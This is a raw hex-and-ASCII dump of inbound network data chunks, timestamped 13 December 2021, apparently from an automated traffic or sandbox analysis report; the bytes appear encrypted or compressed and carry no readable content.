4f d5 cc 51 f6 4d c5 2d d5 94 07 e9 3f 2c 7f eb b8 75 3b 53 ae c1 0d 8f 9d 37 ab b2 76 76 bf 2b 5f 7d aa f3 90 6c bb ef b9 95 fe b7 56 89 b7 82 9d fb 9e f4 2f 33 16 79 ed f5 fd ea f2 1a
                                                                                              Data Ascii: L_r~W*=P%M7oy=rVZoXuJ23Vn>Z`bqT"b}pot,"7o(5C: _=8gy#jj3^$BX<+g.6m(OnC!OQM-?,u;S7vv+_}lV/3y
                                                                                              2021-12-13 23:57:18 UTC6883INData Raw: 29 2a af 0b 22 53 d7 f2 f0 d1 ff 88 43 89 e5 b8 13 c2 24 a5 85 d8 26 99 0a 84 b0 c1 04 69 44 08 66 26 4e 69 61 f6 91 58 2a fa 5c 54 8b 17 c0 61 5a 9d e2 b3 8e a0 14 22 5d 14 49 75 35 26 c8 a0 8d 64 5a 8b b1 56 81 d5 77 7b 76 fd a9 b2 97 5b b6 56 32 e2 01 46 95 f3 e3 b6 8f 21 c0 eb 63 e8 cb b3 d6 bc db dd d6 d7 86 13 04 ea 5c 25 cc 18 02 7b e8 f4 de 38 46 c4 5e 49 8e 3e f1 a6 b5 d5 56 f5 ec 4f e1 9d e7 c7 29 25 6f ed 7d d6 b0 c7 9d 50 c0 c8 b6 38 3f d2 23 43 97 35 6f ae 57 7c 66 25 1a 16 ab 57 b4 da be 74 5e 92 73 39 67 c2 5a 54 ae 7b 45 2f 4d 28 da 57 e4 62 fc c8 35 a7 d8 ae 4b 21 00 68 0f d5 41 b1 9a cc 6f c7 e8 41 84 ea 95 eb 77 f7 7e ee 3b 28 4e d3 4e 0d bb 37 8c 71 3d 1d 12 87 a9 88 ec b3 b4 df 20 50 55 f4 da 9e 34 99 d3 06 74 70 f1 1d ef b8 b9 75 12
                                                                                              Data Ascii: )*"SC$&iDf&NiaX*\TaZ"]Iu5&dZVw{v[V2F!c\%{8F^I>VO)%o}P8?#C5oW|f%Wt^s9gZT{E/M(Wb5K!hAoAw~;(NN7q= PU4tpu
                                                                                              2021-12-13 23:57:18 UTC6884INData Raw: d8 f4 42 e9 d7 b7 cf 4d be 37 5f 61 0b ff aa cb cc 02 6e e2 db dd 95 c8 85 f7 43 9a 61 bb 8a 86 0f 3c 28 05 4b f9 8b f8 b9 62 45 98 82 6d 7a b7 53 a1 36 ff 21 f8 a9 9b b4 b7 e8 c1 4e d7 85 c2 d8 03 bb f6 7d e5 cc da 48 b2 f3 6b 81 55 b9 3f da 47 15 83 f3 1a 7f 9c f2 02 72 9e 8e 0a 34 70 c7 6e 78 de 1e f0 07 36 87 04 ac 25 79 c9 18 4c 62 84 78 04 58 58 a0 b9 58 df 8b b7 a1 74 e6 65 f4 d3 82 37 92 6d 18 dd f9 07 03 0f e1 1d e1 a0 e6 36 b5 0e e4 35 a1 be 06 ee f1 14 d5 fe bf 42 a7 ea 70 c3 d0 67 14 60 af ac d2 f7 8c 67 01 14 fc 85 b9 44 40 40 93 25 89 03 55 57 e0 ff 55 d9 fe 00 c5 7a 54 d2 dd 02 a3 10 3b 7b 89 ab 35 3c e8 26 ec a6 d2 0b e9 b4 99 b2 6a 23 c0 eb 2c 56 ed ea 95 88 66 71 74 87 6d f2 1d 84 12 af aa 7b 2a 24 ef 50 2b bd 6f aa 1c 97 5c b0 e7 1d 9e
                                                                                              Data Ascii: BM7_anCa<(KbEmzS6!N}HkU?Gr4pnx6%yLbxXXXte7m65Bpg`gD@@%UWUzT;{5<&j#,Vfqtm{*$P+o\
                                                                                              2021-12-13 23:57:18 UTC6900INData Raw: da b8 37 0d 7b e5 cb 71 e9 d0 aa 91 6b 6a 06 a9 04 99 0a 76 07 a6 1a 6a 2a f8 d2 ae e1 01 a6 a3 cc 8d dd 98 27 a0 03 7d d1 40 31 8f 57 f8 c5 4b 90 2d 0d f8 4a ea d2 55 71 61 9c 50 82 4c 5f 7f db 36 fa cd df 0e ee 3a d8 75 a9 81 cc 74 6a 4d 3e e9 a6 81 16 68 09 f9 ad a9 1c 3d d5 ec a0 07 bc 4f 07 0b 25 2d 4b 80 4f a4 bc f5 e3 19 d1 84 a5 5b 06 de 44 47 3f 66 22 74 22 9d 99 e4 f5 cc 7b 74 f2 e9 e4 5c 02 db a0 41 02 25 9f 39 b6 ac 75 63 3f 03 4d f3 ee 83 31 3a e7 ef be b4 51 04 e7 50 af f8 8b 13 5a 15 81 5e ae c3 37 b3 72 47 63 05 84 92 7e ab 06 14 06 73 9b 5e 7f 33 c9 b4 c3 a6 85 af c5 58 9b 74 48 66 c8 c3 75 0e 7e 46 97 24 5d 16 3a 08 a1 5f 4f 42 ea 22 87 01 39 99 eb 5d 36 42 20 d7 81 57 21 35 bf aa 42 3b 9c 83 25 f3 f5 0a 61 cb 05 34 93 9f 47 81 bc f7 2d
                                                                                              Data Ascii: 7{qkjvj*'}@1WK-JUqaPL_6:utjM>h=O%-KO[DG?f"t"{t\A%9uc?M1:QPZ^7rGc~s^3XtHfu~F$]:_OB"9]6B W!5B;%a4G-
                                                                                              2021-12-13 23:57:18 UTC6901INData Raw: 65 04 39 f7 f9 75 1a 88 6f 1a 9e 39 49 6a ef e8 a2 c2 71 2d 7a 28 48 1c ba e4 c3 17 35 ac 0e 84 de 70 3d 03 c4 21 6d 0a 45 4c 86 93 fd 43 33 21 45 2f 74 f9 01 b6 ff cb 37 5d 9d 9e 7f 01 95 02 33 02 db 20 c6 9c d8 1e 25 15 11 b2 97 dc 79 70 0d 93 9d 72 04 72 69 8b 6a 45 10 d2 fd 12 9e ca f0 c9 da 4a 90 ca 61 60 84 9c ee aa cd 20 4e 04 d7 1b 82 07 47 b9 b6 40 c9 f3 0a 8f d9 da c4 58 f7 5b 26 5e 1f 44 07 37 ff a5 fa 85 1e b9 6d fa 46 74 ff 51 70 2a 01 c4 9f cc 0f 23 75 6e 39 e5 00 46 4d 44 6c e6 5c c2 26 9a 94 c1 57 f9 2c 83 56 af 04 35 87 ac 3a 03 00 e5 d2 1c 40 02 0a a1 f5 36 5f 79 fc 12 19 58 a9 1a 33 07 44 10 a0 4f e2 4c e2 06 2a 7b 22 95 8f 8a f5 ab 12 3d 82 39 45 85 4b a5 b2 7a 56 ee c4 ce 30 38 e4 2e fc 38 f9 e9 86 7f 0c 9f 23 82 ae d3 66 51 4d 56 42
                                                                                              Data Ascii: e9uo9Ijq-z(H5p=!mELC3!E/t7]3 %yprrijEJa` NG@X[&^D7mFtQp*#un9FMDl\&W,V5:@6_yX3DOL*{"=9EKzV08.8#fQMVB
                                                                                              2021-12-13 23:57:18 UTC6917INData Raw: c1 ba d8 bd 6d d1 ba 15 69 b9 be 22 cc ac 9c a7 85 9e 61 13 c5 2a 25 88 1b 18 6b eb d2 95 ae 3c c4 b6 fc 1b d3 98 40 85 b7 74 c5 a0 56 86 8d 47 2b 11 4f 5c 4c 74 74 4b 97 5c 5a 6c 8a fa eb 30 f1 1d 17 86 cf a4 6f 3a 59 18 4e 19 4c 75 eb a6 f6 2b ab 51 86 f8 c9 e3 db e7 6e eb da 30 58 52 ba cf 7b c0 5f fe 20 e0 cc 9a 4c 07 6d 11 3d 8b 78 c1 7a b3 db 37 16 26 d5 76 8b 81 d7 73 1b 50 06 fe 3d 39 b8 cb b0 10 26 b7 81 a6 31 dd 90 40 c1 6d a1 8e 40 cc 06 1e 76 53 0c 50 7e b0 3c be d8 01 0d 79 d4 bd 71 12 4d 9d 9d a0 ac 0d 66 73 a4 b3 fd b8 e7 57 c6 17 d1 42 72 d2 96 a6 0e b1 96 6f ea 42 d4 54 8e 33 ad 89 e8 9c 6c da 27 fd b3 00 03 ba 10 15 69 9f 28 f4 14 c2 01 48 6e 21 2f 79 1f e1 ba a7 f0 63 e9 11 6c c0 a5 40 ac 3d d1 73 2e fe 61 b5 06 4d 3b 88 20 fa 7f de e5
                                                                                              Data Ascii: mi"a*%k<@tVG+O\LttK\Zl0o:YNLu+Qn0XR{_ Lm=xz7&vsP=9&1@m@vSP~<yqMfsWBroBT3l'i(Hn!/ycl@=s.aM;
                                                                                              2021-12-13 23:57:18 UTC6918INData Raw: 78 29 9b 8c a2 30 0f c7 2e de 49 de 79 73 1e 9d a4 bd 09 ce 94 95 fa 83 0b 02 f4 68 47 8a 8d 35 cf df d3 aa 3f 08 76 4e 2f 8a e1 07 7f 1a 99 1c a7 f4 b4 34 e1 2e d7 2e 15 68 e1 29 01 80 12 ac 0f b5 2d b6 ce 68 b4 61 95 b1 33 e4 f1 07 1a 61 f9 6e 74 34 eb ff d4 60 7f c6 49 20 e8 68 4b a7 91 a1 d9 1d db 14 4b 1f 9c 1e 7e 31 bf 10 78 50 78 ed 07 1e 79 44 74 8b 4a 98 e4 c3 b9 dc 1e ba 3b 12 c4 82 44 1a df 2a 9b a4 7c b8 29 25 a4 6a e0 5d f8 48 43 0f 2f 47 7d 42 d1 30 62 7a 8b f0 42 fb 86 94 0e d2 49 24 25 ce 02 58 35 f5 89 cc 6d d1 dc 14 43 1a 1d 85 fe b6 bc 93 4b 18 5e 6a a2 64 cc e3 be db 88 1b b6 7d 69 6c 21 0b 65 29 77 c8 a8 d3 14 ce c6 58 0e 73 d0 a6 5e ce c5 d3 f1 ad ec b5 14 6a 22 0b 04 2a c7 f0 72 94 9f b0 ee 5c af ce db 5f 6f 18 99 bb c3 03 13 1e 14
                                                                                              Data Ascii: x)0.IyshG5?vN/4..h)-ha3ant4`I hKK~1xPxyDtJ;D*|)%j]HC/G}B0bzBI$%X5mCK^jd}il!e)wXs^j"*r\_o
                                                                                              2021-12-13 23:57:18 UTC6934INData Raw: dc 55 46 cb 22 13 b4 05 be d2 ea cb ce ad 9b 1e a8 52 4b 0d df 8e 06 f0 34 9d 57 24 92 9c 3b 79 4d 75 c4 ac 88 64 f9 d0 f3 bc 1d 91 98 f6 2f d9 ef 49 9c 11 b9 d9 41 7e 9b 04 8f 02 19 c5 3b 8c f5 da f1 06 ba 53 97 6f 98 aa 90 dc 56 0d 8b 52 17 f4 ac b1 bf 8b db 0b 56 fb 99 c0 89 41 e4 ca 33 e4 1a bb 3f 8b 91 d3 40 d1 a2 81 93 2f 55 35 0b a4 d5 4b 35 a0 31 5e d9 77 5e d9 7c a8 0b a1 5f 34 33 3e a6 5d f9 e2 23 8e 2d 98 92 d2 33 25 81 91 91 fa d9 70 be 66 ab 1a 1b b8 fd 58 e5 28 c8 07 71 f0 39 ac 17 35 fc f9 5c 5d 93 e1 41 d9 33 9f f1 ae 8f 3c 1e ba b3 c8 30 45 b6 0d 32 54 72 40 7c 98 c3 91 ee 22 f4 66 37 81 c6 27 dd 6d a5 22 db c9 20 68 a4 42 97 23 8b 60 3c a7 d0 ac 60 cd ff b5 36 2d 15 aa 35 17 7d f6 08 44 ea 33 c0 a4 19 fd 13 73 71 c4 ea 78 9a b5 8b 42 e9
                                                                                              Data Ascii: UF"RK4W$;yMud/IA~;SoVRVA3?@/U5K51^w^|_43>]#-3%pfX(q95\]A3<0E2Tr@|"f7'm" hB#`<`6-5}D3sqxB
                                                                                              2021-12-13 23:57:18 UTC6935INData Raw: 99 e0 54 38 f1 bc b3 6c 96 39 b0 bc 88 cf 04 67 9e 22 86 32 e4 03 07 d2 4d f1 ee 77 f9 30 2b 8f b4 af 99 98 12 65 87 bf 69 1d 46 60 37 11 33 61 e8 63 6c 6b 4e fc 9d a9 cb 0e 07 ea 32 b0 d3 da 2f e7 ba f4 9d 60 3b 5f 18 96 0f c7 a1 fe f0 b0 a3 0c af e2 81 66 10 2c ea 59 ac 0b 11 2a c1 5a da b7 ac 5b 29 28 bd c4 bb 19 38 e3 9a 56 31 b0 20 05 c6 dc b6 7f e6 3e a9 96 90 02 11 59 6a d0 97 8f 98 3b 24 fd e8 1a 42 72 97 b7 b7 b1 44 4d b6 c8 8c 28 37 6f 3c c9 f9 c7 44 50 4d c5 c4 6d a9 9e de 4a 52 3b 09 2a ea 16 8a 8c 7d 91 c2 a7 86 03 f4 27 19 2d 8c 19 1d 22 7f 44 b8 ec 80 ab a7 70 4d 60 5d 16 de bb 84 53 11 99 8d 4e a3 00 21 0a b8 c3 98 bf 73 4d fb ee 35 e3 fe 1a 1b 6b 0d 84 23 fa a0 7d d0 9a b8 1b 5a a9 23 28 ec 24 ad e6 dc 6b 05 86 2a ce f5 1b 65 05 bd a8 45
                                                                                              Data Ascii: T8l9g"2Mw0+eiF`73aclkN2/`;_f,Y*Z[)(8V1 >Yj;$BrDM(7o<DPMmJR;*}'-"DpM`]SN!sM5k#}Z#($k*eE
                                                                                              2021-12-13 23:57:18 UTC6951INData Raw: c3 14 e4 a5 59 e3 0a 9a 47 99 23 d9 5f 1e 4b 9a 6f 1f 2e 87 df 02 40 f1 12 7b 05 39 08 20 66 2a 6e 10 14 8d 57 50 dc 1c 52 65 69 ea 78 17 39 3d 0d 14 16 2e 76 51 cd 6b 45 9b 4f 89 64 74 56 69 69 ba 09 2b 41 0d 95 08 54 24 25 d4 98 f7 b7 f4 c8 34 66 dd ee 3c 89 2e 20 59 d8 32 be 3a 4e 24 93 95 5c ab f9 b0 8f 0c cd 8a e2 ca e0 b9 4f 60 3a 6d cf 75 00 ff 52 a4 d8 ed 12 61 06 ae c7 86 42 c6 ce 61 8c 98 38 9e 64 82 20 69 f4 1d 8f 5d 66 e0 bd a2 31 12 d0 3c 03 eb b4 d3 2a 6d e7 69 d5 95 94 58 bc a6 41 0c bc 95 fe 47 5b 3c bc d2 02 28 eb 01 77 ac bb 91 5d 91 be b7 aa b8 51 8a ee 2c 06 45 c0 5e 42 14 25 37 02 5c ab 9d e3 67 5f 94 ee f0 99 b1 66 ef ac 0b 56 36 fc 2b 4a 4d 8b 08 07 67 7d a8 a3 f0 33 86 3a ed a8 73 58 8d 76 22 7f 9b ee c7 90 28 d0 fc b5 0b e5 9b 9a
                                                                                              Data Ascii: YG#_Ko.@{9 f*nWPReix9=.vQkEOdtVii+AT$%4f<. Y2:N$\O`:muRaBa8d i]f1<*miXAG[<(w]Q,E^B%7\g_fV6+JMg}3:sXv"(
                                                                                              2021-12-13 23:57:18 UTC6952INData Raw: b7 f6 68 7b 7e ca 45 9f 65 f9 b6 bd 63 00 82 6a 7c e6 11 5d c4 26 fd 11 44 31 09 54 3c ba 1b 0b 2c cf 98 a1 fd 2c 4d 58 55 f3 45 f8 e5 62 28 fb 3f e1 21 d9 da eb 98 50 3b db fe 6c 56 f9 eb 97 dd 94 3c 7f 7a ad 1f ce cb 87 93 32 8c f5 78 6a 0f 8f e6 16 48 16 74 27 68 63 bf 4c b3 2a 92 25 29 0b 8e 0f 5e 2c e2 33 3a 47 55 05 d6 39 46 19 4e 4b 5c 10 a6 63 6f 9c ca 87 62 52 42 64 e5 f3 d7 b5 66 61 ab 56 14 91 ea 1f 57 ea 73 58 b0 1d 71 39 bf f8 64 0a 8a 9c 04 c7 13 ba f0 e5 35 d0 86 c4 4c 66 2c c3 85 f5 71 60 4d 2c bc a9 38 db 8f e8 22 da 2d 10 b6 30 35 85 4f d5 16 80 65 96 76 0b 36 6d c0 cf e9 38 f7 58 99 b8 c1 fd 92 30 ec 58 e1 bd b8 5a 9b bc 55 8d f8 c5 88 b2 15 0e 80 1f 9e ca b1 5b 38 69 c1 a5 f6 a4 e3 c2 03 90 83 ed 06 b0 d6 0a 57 8a b6 f4 a2 f3 f7 dc cf
                                                                                              Data Ascii: h{~Eecj|]&D1T<,,MXUEb(?!P;lV<z2xjHt'hcL*%)^,3:GU9FNK\cobRBdfaVWsXq9d5Lf,q`M,8"-05Oev6m8X0XZU[8iW
                                                                                              2021-12-13 23:57:18 UTC6968INData Raw: 39 93 b4 2c 72 5c 72 af 58 12 3f 2c c3 25 3b 69 04 68 29 d9 c5 fe 62 79 5c dd f0 a0 3c e9 79 55 cb 74 d9 64 55 a4 28 8a fa 84 95 9c 46 5d 2e 1b 2c 42 9f d6 53 07 af dd 08 9b 3f 46 12 a5 14 fd 96 f6 fe b3 29 0c 16 4f 16 6b e7 b0 e5 49 84 a4 b4 32 89 59 04 18 31 48 bd 53 af 10 66 8c 06 1d 86 1a e1 33 92 ea f1 c9 06 cc a7 7b 67 1c c5 6b b2 b4 1c b2 13 a3 ba cf ff d1 c8 84 84 14 60 ba 95 42 fb 39 d6 ab b8 c5 57 02 ed c6 bf f1 32 cd 1b 2c d4 75 1d 0e 8f 6d 00 a5 db d4 a7 c2 ea 61 94 83 f9 54 2a 28 ce f0 83 ef 41 39 3c 35 d7 4a 33 92 41 2a d1 3b 29 7d a2 b8 11 c5 ac 41 5f 18 ff f9 74 b5 63 77 75 c1 70 74 fe b7 cd b3 64 cf f2 a8 90 d2 b7 34 ef 25 cd ad 56 50 82 8d 88 f2 58 80 59 ab ce fb 86 4c 9d 4b 77 72 b5 92 cb 36 bb 34 ff db 6f 9f d0 dd 2b f2 74 18 a0 63 27
                                                                                              Data Ascii: 9,r\rX?,%;ih)by\<yUtdU(F].,BS?F)OkI2Y1HSf3{gk`B9W2,umaT*(A9<5J3A*;)}A_tcwuptd4%VPXYLKwr64o+tc'
                                                                                              2021-12-13 23:57:18 UTC6969INData Raw: 80 ea 6c a7 98 3f 1f 21 a6 24 a9 d5 e2 0e ca 1f d3 cc ae b3 7f 85 9f 03 dc c3 58 4e 73 9c d1 70 86 99 4b 6a d1 62 3f 16 d9 4f 1e c9 8b db d8 51 8c 03 26 e6 0e b4 c0 a7 2d 60 a4 1c 66 6d d3 70 26 be 48 ff cf ed 81 e6 57 9b a4 76 be be b9 f1 a3 fa 02 5e e9 92 28 d7 f2 de fc 81 44 c2 f9 9c bb 35 0b ab 5f dc 2b 73 dc 36 09 87 4e ac fd 4f 2b 77 5e c5 a2 ce 9e 34 e9 df f1 cc 7d 4a f3 40 f4 32 40 eb 12 92 6d 06 9f 11 5e 63 af 90 28 72 47 fc de 4a 0c 6e 4a 75 1b 85 99 38 18 a6 d6 74 24 5f c0 bc e1 a7 12 03 b3 49 82 fb 8c ab 76 fb 13 71 34 d3 37 f6 f2 39 2b e6 0f 9d c9 3a a7 a9 08 90 d4 7c 0a 13 90 5d d1 0c 5c 31 d5 ad 30 bb 43 28 6a a5 44 28 b4 74 80 6b ca 33 7e ff cd c8 34 f5 a9 7a 25 e7 99 ad e7 10 4e 26 45 4e b6 66 dc 2c de 0d 55 fb 78 41 8b 00 8c 85 93 c4 fa
                                                                                              Data Ascii: l?!$XNspKjb?OQ&-`fmp&HWv^(D5_+s6NO+w^4}J@2@m^c(rGJnJu8t$_Ivq479+:|]\10C(jD(tk3~4z%N&ENf,UxA
                                                                                              2021-12-13 23:57:18 UTC6985INData Raw: 14 d5 49 04 59 32 c8 24 4c 00 4e e8 79 00 ca f7 d0 b7 75 be cb 7a c7 0f 12 03 a9 af 7c b4 57 c7 25 b4 bf e7 c7 2c c3 be 0b f0 24 7f 6d 2b bd f1 e5 3c 2e da 7d f0 c5 18 82 c0 80 24 f4 27 c7 ab 3d d4 eb fd e1 bd 0d d3 e5 63 71 e9 0c ad 0a d8 fe b0 91 35 be dc 1c 41 9b 1e cf ce 7a 1f 7b 4b 72 1d 81 2a 7b 27 97 63 61 46 69 43 10 ce b8 11 8c 50 ad 26 c7 6f 8b 90 34 b2 28 c3 27 8e f1 f0 fd b2 15 a8 6d 6a d7 80 1c 80 39 37 5f 84 3a 87 b6 32 10 41 d7 d8 15 0c f1 1e 06 de a0 21 72 b1 44 7e a7 87 05 78 d5 a5 72 dd 16 6b 79 40 a0 e3 16 18 fa 0d 03 c1 e6 4d a3 67 99 9e 04 8e be 28 92 1d 1e 1d 9b 2c 10 13 3d 87 91 b4 7a 50 9c eb e0 e2 dc ef b2 b6 de 73 c2 d7 1e 56 c9 1e e5 16 3c 35 19 8a 94 5b ef af e1 aa 90 5e 52 02 31 24 d6 e1 45 cd 72 fa 52 b1 89 3c 60 bf 11 06 13
                                                                                              Data Ascii: IY2$LNyuz|W%,$m+<.}$'=cq5Az{Kr*{'caFiCP&o4('mj97_:2A!rD~xrky@Mg(,=zPsV<5[^R1$ErR<`
                                                                                              2021-12-13 23:57:18 UTC6986INData Raw: 13 35 f4 64 9c 87 17 3f a0 b1 be 4b 0f 0e 9c 9c be a1 ff 6d 69 e7 19 d4 1d c7 ab 07 d4 43 e0 69 39 fe c4 1a 09 36 87 c1 2b 78 6a e7 aa b7 35 05 f6 6e b7 7f 15 fa ef 65 68 78 a9 ae 9f 16 d9 c8 20 db 2f 63 52 9d d1 c1 8f 53 2a a5 9e 71 2d b2 37 76 29 42 09 0a 91 88 c2 5f 0e 96 6e c9 ab d0 3b 0d ad 6a 07 f8 15 91 b4 7e 06 b1 ad 0b 81 2b a1 b9 89 ac 68 e9 92 9e e5 bd 09 94 6b e6 e5 88 fd f2 5d 91 7b 8e 69 71 29 5d 2f 48 ce 33 d9 65 80 28 d9 2e 76 00 2c 12 b4 a7 5a b5 95 1b 17 ae 3a 43 1d c3 2d 31 f5 f4 59 44 9f e2 88 de 56 04 86 10 8f fc 0f 0c 0b 05 d0 fe 3f e9 e9 84 4e d2 e9 68 07 db ce 4e 2e 24 e2 49 d4 13 2a 07 ac db 04 33 01 d2 30 0e 33 4f 5f f3 fe 5a 2d ac 0f 0c 1b 44 25 db 53 f5 fd af 34 c9 cf aa 75 ab e7 0e e3 5b e4 36 0e b5 94 f9 33 74 c4 49 87 07 39
                                                                                              Data Ascii: 5d?KmiCi96+xj5nehx /cRS*q-7v)B_n;j~+hk]{iq)]/H3e(.v,Z:C-1YDV?NhN.$I*303O_Z-D%S4u[63tI9
                                                                                              2021-12-13 23:57:18 UTC7002INData Raw: b0 49 02 0f 58 e9 2d 64 20 37 d9 a4 79 80 32 ee 99 d0 7e c4 e3 25 39 79 ed c8 e9 12 3c f9 ea a0 5f 31 12 93 c9 46 20 53 24 89 5f f3 96 50 12 89 a8 98 63 8b 6e c6 e1 46 a9 e7 32 61 4a 45 4b 5c b9 0e 4f fa 20 cd 79 c7 f1 31 a1 27 a5 8c 0b c4 89 b7 1d 27 b2 39 88 77 8a 67 c0 cc 26 f6 93 66 a3 2c 60 39 0d 50 88 08 46 c5 78 20 86 93 f9 40 d9 57 5b 11 d6 0b 1a 84 aa 45 70 6d 2a 83 28 6d 55 fa bb 4a 99 b2 d7 48 7b 3d 82 89 6f fc a0 ad d2 37 fd 7f 7e de d5 bb 16 16 e1 06 75 dd 50 f4 ed 61 7b 99 b2 6d 50 39 6d ae 8d d8 55 67 33 ee 4d 21 ee d9 fb be 6d ec f0 98 59 99 2c c9 67 c4 3a 9a 02 b9 a3 93 c4 54 a3 28 1e 6c cc 08 e8 da f3 7f 36 1c 88 82 a8 2e 96 5b a0 d4 c4 9b 1a 0a 57 7d 84 9d ab ab eb f3 91 54 06 79 97 3e f8 ef 06 dd 05 a7 b1 c8 f8 c6 bd e7 93 dc f8 be a8
                                                                                              Data Ascii: IX-d 7y2~%9y<_1F S$_PcnF2aJEK\O y1''9wg&f,`9PFx @W[Epm*(mUJH{=o7~uPa{mP9mUg3M!mY,g:T(l6.[W}Ty>
                                                                                              2021-12-13 23:57:18 UTC7003INData Raw: dc cd af 3a 32 a7 ed 4d e6 45 5d 5b 1a 28 62 7c 65 c3 45 6a 49 9c 4d 19 0f 42 52 41 ab 4d a5 b8 89 44 57 bc ae 20 96 da 8d 8e e9 4e 46 d2 38 fc d8 38 56 97 1e 3f cb 10 1c e8 6f 91 6b 19 69 73 ff d0 75 9e f8 f0 fe 0f 29 27 bb 9a 12 af cc ba ae 6c a9 9b 49 8a 1a 99 47 29 f6 42 5b 64 58 ef db e3 29 30 c0 98 a2 f9 bb 5c a8 fb 5c e8 17 80 14 41 34 88 a7 7d d0 cc b3 0b 2f 81 b6 9e a7 0a 05 48 52 da 6a 35 09 4c 01 ab ad b6 58 89 4a 42 b2 87 f3 c5 da 57 87 cf ad e3 a2 ad 9c f5 70 55 77 ab d4 1a d9 3d 01 83 01 c8 55 23 41 d1 37 ea ca 8d ff 8a c3 d2 28 bf bf f1 94 1b 2b 5c a6 0a 26 9e 61 7c 81 e2 e6 a6 ef 26 64 c4 2d 35 42 b4 89 af 47 f2 fd 28 cb ff 1f 9d b6 67 23 68 8a a6 84 c5 92 4d 56 e7 47 ac 61 d4 c9 09 eb a2 8d 3e f5 68 60 ae 93 ab 46 27 8f 14 19 3e f5 ad 4b
                                                                                              Data Ascii: :2ME][(b|eEjIMBRAMDW NF88V?okisu)'lIG)B[dX)0\\A4}/HRj5LXJBWpUw=U#A7(+\&a|&d-5BG(g#hMVGa>h`F'>K
                                                                                              2021-12-13 23:57:18 UTC7019INData Raw: bb 38 cb 2e 42 3a e1 a9 a0 b9 66 ca 89 00 be 35 ed 98 0a ce fa b9 8e 51 75 dd af 26 ad 69 64 ea ec e9 ac 4c 2b f9 43 89 46 73 e9 d9 3e fb d5 97 1e fa 99 16 a4 d5 10 26 1e 12 81 c8 ce 6e 09 9f 4d f0 49 9a 0f fb 2b 9b 5a 2b 4a 83 91 77 e6 88 17 c7 c6 6d b0 ee 80 e8 95 26 aa d5 df 40 00 da 5d c1 c9 dc 81 03 23 7c 71 15 b4 63 c8 ad 99 d5 cc 9b bd 47 aa dc 8b ab a2 bf 98 b1 a3 66 9f 13 82 42 b4 97 72 ec 98 72 97 13 da 88 3a 45 dc 7a c2 29 f2 83 88 f0 ef d3 73 dc 21 75 12 02 66 5c ad 65 7f bc 3d 06 db 42 69 1c 00 cb a4 0f ad 4f 6f 59 f6 4f d2 76 43 7d ee 6e 2e cf 78 49 4d 2b 1f b3 ca 05 bc bf dd 95 9b 9f 15 d7 7e 81 0a 35 48 0b c2 1a 93 31 15 47 0a 87 13 6c e1 2c 85 28 38 d1 27 83 bc 55 20 fc f3 e3 6b eb 17 6e 86 e3 57 34 e1 9d c4 95 7a a9 74 8c 9c a1 e6 81 f5
                                                                                              Data Ascii: 8.B:f5Qu&idL+CFs>&nMI+Z+Jwm&@]#|qcGfBrr:Ez)s!uf\e=BiOoYOvC}n.xIM+~5H1Gl,(8'U knW4zt
                                                                                              2021-12-13 23:57:18 UTC7020INData Raw: e0 53 4d 7c 4f 53 ce 11 a9 ff 6e 7a a7 86 84 29 41 5d ec e1 b6 00 0b b4 db 99 5c 5d c7 d4 ef 2f 2c a2 56 fd dd da d0 f2 19 43 61 1f af 7a e1 76 c6 b5 d3 f7 62 94 b1 69 55 8f 29 2c 7d 32 07 98 a2 4b ca d5 85 b5 a0 3a 3c 08 62 24 7e 5b 9a fa c4 18 78 32 f6 ff f2 8b e2 94 8b c1 ac 1c 43 da df 38 9a e0 e0 9c 08 01 f7 00 e9 bd 52 38 2f 13 d3 86 ff f9 fa 1b 21 fa 95 48 dd f7 5d 87 15 c1 74 a1 13 32 3d f7 53 45 64 30 c9 d2 4a 9e e3 53 4e 4b 9f 05 1e ef c7 2e 2f 7f 9b 40 ef 3d df e7 4c ea 27 d3 0f 9f 3b 61 da db df f8 81 f9 06 96 40 81 38 a3 bc 55 7f a1 c3 5a 18 da ef a0 21 3f e7 6b ac ed 29 f4 ba 78 ea 44 b5 11 01 59 b3 9d cf a2 9f 0d d6 30 a9 82 2e 09 ee fb dc b9 4e 58 f5 9a 73 6b a7 87 43 38 f9 54 f1 7c c3 d5 9c 49 d7 ee 2f 0b 29 c4 1b 30 da 2d 83 8d c4 80 9d
                                                                                              Data Ascii: SM|OSnz)A]\]/,VCazvbiU),}2K:<b$~[x2C8R8/!H]t2=SEd0JSNK./@=L';a@8UZ!?k)xDY0.NXskC8T|I/)0-
                                                                                              2021-12-13 23:57:18 UTC7036INData Raw: 99 68 eb 1c b9 58 6b 3a fb ae 42 0c 63 90 35 f2 52 35 87 95 03 c9 5c bb e6 5e c9 9c 96 ba e6 14 f5 dc a9 56 78 90 35 ae 42 a2 13 df 44 f8 c8 1b 94 3b 0c 14 18 04 68 d3 0d 01 81 1b b6 99 c8 cd 10 58 e9 b8 92 5f 5c 89 90 59 ba 07 7a 1a c3 2f 0a b4 e5 f8 17 66 b8 3a 6f b4 99 c5 14 e8 ed 3e 07 bd d4 68 33 b2 c4 05 35 98 88 09 a1 5f 96 38 28 6b 2a e3 d2 74 fe a1 61 4d 11 67 e4 cf 19 30 78 f4 ab b5 55 57 3a a8 1f 86 b9 62 58 ed f3 ff 1a 3f f5 55 7e 4c c2 1d 9e 53 cb 89 76 e7 c1 2d de 2c d5 76 ad d6 cc 68 b1 83 1d 60 e2 05 8b 81 3e 95 29 9d 03 ef 21 f6 34 6b ae 7a 16 a7 43 d4 49 c2 e0 83 d6 75 16 8e c4 3b 93 92 c3 ae 4c 45 86 9c 1e 6c ed a6 67 38 92 77 e1 a8 3f 67 dd 0d 4e e5 15 2e d8 cf 07 d1 b1 cd 01 12 16 c8 66 da b7 00 ca c9 b7 12 35 1c b5 19 89 16 9d c8 cd
                                                                                              Data Ascii: hXk:Bc5R5\^Vx5BD;hX_\Yz/f:o>h35_8(k*taMg0xUW:bX?U~LSv-,vh`>)!4kzCIu;LElg8w?gN.f5
